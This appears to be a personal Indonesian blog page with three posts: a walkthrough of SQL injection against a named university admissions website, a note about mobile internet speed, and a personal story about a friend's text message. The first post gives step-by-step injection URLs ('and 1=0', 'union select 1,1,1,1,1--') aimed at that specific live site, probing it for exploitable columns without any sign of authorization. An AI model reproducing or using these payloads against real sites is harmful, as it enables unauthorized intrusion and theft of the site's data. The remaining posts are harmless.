Nginjek Siqil di Kampus Unmuh Malang
Jumpa lagi dengan saya, seorang cupu & orang awam ttg dunia hacking. Kali ini saya akan menjelaskan bugs pada website UMM (Univ. Muhammadiyah Malang) dengan cara SQL Injection >:). Mudah-mudahan langkah yg saya jelaskan tidak salah. Ok, lanjut aja ga banyak bacot…
Buka http://pmb.umm.ac.id/ , sekarang pilih artikel apa aja pada website tersebut. Saya pilih artikel berita, yaitu http://pmb.umm.ac.id/?lihat=1&id_berita=116
Lalu tambahkan dibelakangnya “ and 1=0” (tanpa tanda petik), sehigga menjadi http://pmb.umm.ac.id/?lihat=1&id_berita=116 and 1=0, hal ini untuk mengetes apakah site tersebut bisa di inject atau ga’.
Ada yang aneh saat mebuka URL tersebut? Apakah tulisan pada halaman websitenya hilang?....
Lanjut, sekarang coba tambahkan dibelakangnya “ and 1=1” (tanpa tanda petik), sehingga menjadi http://pmb.umm.ac.id/?lihat=1&id_berita=116 and 1=1
Apakah ada perbedaan dengan yg kita lakukan tadi? Kalau ada perbedaan berarti website tersebut bisa di-inject >:)
Sekarang tambah alamat id-nya (-), menjadi http://pmb.umm.ac.id/?lihat=1&id_berita=-116
Lalu masukkan “union select 1--” --> http://pmb.umm.ac.id/?lihat=1&id_berita=-116 union select 1--
Masukkan lagi “union select 1,1--” --> http://pmb.umm.ac.id/?lihat=1&id_berita=-116 union select 1,1--
Lanjutkan langkah diatas dengan menambahkan angka 1 sampai keluar pada halaman site-nya angka 1 bederet, dan ternyata cukup sampai menambahkan 1-nya 4x udah muncul angka 1 bederet 3 biji, nih URLnya http://pmb.umm.ac.id/?lihat=1&id_berita=-116%20union%20select%201,1,1,1,1--
.... Penasaran? Kalo penasaran silahkan dibaca dg mendownload artikel tersebut disini
Bagi para master, saya tidak merekomendasikan untuk dibaca :D
Ngenet pake Axis
Btw bagi yg belum tau kartu GSM Axis, bisa tau infonya disini . Gw cuman promosi buat ngenet aja, hehehe..
Mulai browsing,, agak kaget 'coz lumayan cepet biasanya lemot. Akhirnya coba ngetes konaksi pake speedtest, hasilnya:
Kepikiran mau download software, akhirnya nyoba pake IDM. Lumayan cepet, biasanya ga sampe dari 5 Kbps
Cara yg gw lakukan diatas ga pake tool semacam toonel ataupun proxy~
Sms dari seorang sahabat
Bosen sama nih blog isinya ttg dunia maya semua. Kalo Luna Maya sih gpp gw mau :p
Gw mau curhat dikit ah :)
Semalem pulang kerja jam 11, begitu nyampe kos, shalat dulu trus langsung tidur. Keesokan harinya pas bangun tidur liat HP ada 3 sms yg masuk, salah satuya dari sohib. Pas gw buka tuh sms dari fadoly, agak sedikit kaget & terharu waktu baca. Ga nyangka aja, soalnya dia ga pernah ky’ gt. Biar ga penasaran ma isi smsnya, nih gw share:
Saat malam menjelang, Allah membuka pintu rahmat-Nya. Jika Ia bertanya: apa harapanmu? Akan kukatakan, “Jaga & lindungi sahabatku ini selalu dan selamanya tetap di jalanMu”.
Itu dia kirim pas jam 12 malem. Abiz gw baca, entah kenapa gw jadi kangen dia. Upz,, jangan salah sangka, gw masih normal koq, gw emang selalu kangen dg temen deket/sahabat gw entah itu cowok atau cewek. Terakhir ketemu dia pas acara meridnya 1 bulan yg lalu.
Karena bagi gw, sahabat adalah segalanya. Banyak pelajaran hidup yg gw ambil dari dia.
Statistics
